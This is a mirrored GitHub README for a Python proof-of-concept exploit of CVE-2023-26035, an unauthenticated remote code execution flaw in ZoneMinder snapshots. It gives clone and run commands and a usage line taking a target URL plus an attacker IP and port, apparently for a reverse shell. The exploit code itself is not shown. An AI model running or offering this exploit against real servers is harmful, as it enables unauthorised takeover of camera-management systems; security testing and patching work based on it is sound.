Giters

rvizx / CVE-2023-26035

Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

cve-2023-26035exploit

CVE-2023-26035

Unauthenticated RCE in ZoneMinder Snapshots - PoC Exploit

alt img

Description

ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action.

Usage

git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py

python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Requirements

pip3 install beautifulsoup4

Credits

UnblvR discovered the vulnerability.

About

Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit

cve-2023-26035exploit

Languages

Language:Python 100.0%